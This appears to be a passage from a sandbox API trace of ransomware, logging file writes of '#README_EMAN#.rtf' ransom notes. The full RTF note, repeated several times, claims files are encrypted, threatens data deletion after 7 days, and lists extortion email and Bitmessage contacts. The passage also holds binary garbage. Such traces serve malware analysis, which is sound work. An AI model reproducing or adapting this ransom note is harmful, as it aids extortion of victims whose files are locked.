!!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n³:Ý\x11\x97b\x1c\x19dÁÎ\x1dتxU¼É¯\x84\x82\x186Ó\x19", lpUsedDefaultChar=0x0) returned 8717 [0301.690] WriteFile (in: hFile=0x27c, lpBuffer=0x1eecea8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1eecea8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0301.691] CloseHandle (hObject=0x27c) returned 1 [0301.691] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\ja\\#readme_eman#.rtf")) returned 0xffffffff [0301.691] GetLastError () returned 0x2 [0301.691] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\ja\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0301.692] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0301.692] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0301.692] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If 